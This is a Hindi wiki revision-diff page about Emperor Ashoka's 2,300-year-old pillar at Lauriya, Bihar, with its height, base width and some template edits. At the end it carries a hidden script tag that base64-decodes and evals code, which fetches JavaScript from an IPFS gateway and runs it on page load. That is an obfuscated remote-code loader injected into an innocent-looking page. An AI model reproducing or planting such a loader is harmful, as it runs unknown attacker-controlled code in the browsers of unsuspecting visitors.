Difference between revisions of "अशोक स्तम्भ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{पश्चिम चंपारण के पर्यटन स्थल}} Category:बिहार Category:बिहार_के_नगर [[Category:पश्चिम_चंपारण_के_पर्यटन_स्�)
Line 1: Line 1:
 
नंदनगढ से 1किमी. पूरब में यह जगह लौरिया प्रखंड में स्थित है। सम्राट [[अशोक]] द्वारा निर्मित यह स्‍तम्‍भ 2300 वर्ष पुराना है। यह 35 फीट ऊंचा और इसका आधार 35 इंच चौडा है।
 
नंदनगढ से 1किमी. पूरब में यह जगह लौरिया प्रखंड में स्थित है। सम्राट [[अशोक]] द्वारा निर्मित यह स्‍तम्‍भ 2300 वर्ष पुराना है। यह 35 फीट ऊंचा और इसका आधार 35 इंच चौडा है।
  
{{पश्चिम चंपारण के पर्यटन स्थल}}
+
==सम्बंधित लिंक==
 +
{{बिहार के पर्यटन स्थल}}
 
[[Category:बिहार]]
 
[[Category:बिहार]]
 
[[Category:बिहार_के_नगर]]
 
[[Category:बिहार_के_नगर]]
 
[[Category:पश्चिम_चंपारण_के_पर्यटन_स्थल]]
 
[[Category:पश्चिम_चंपारण_के_पर्यटन_स्थल]]
 
__INDEX__
 
__INDEX__

Revision as of 09:11, 1 July 2010

nandanagadh se 1kimi. poorab mean yah jagah lauriya prakhand mean sthit hai. samrat ashok dvara nirmit yah sh‍tamh‍bh 2300 varsh purana hai. yah 35 phit ooancha aur isaka adhar 35 ianch chauda hai.

sambandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>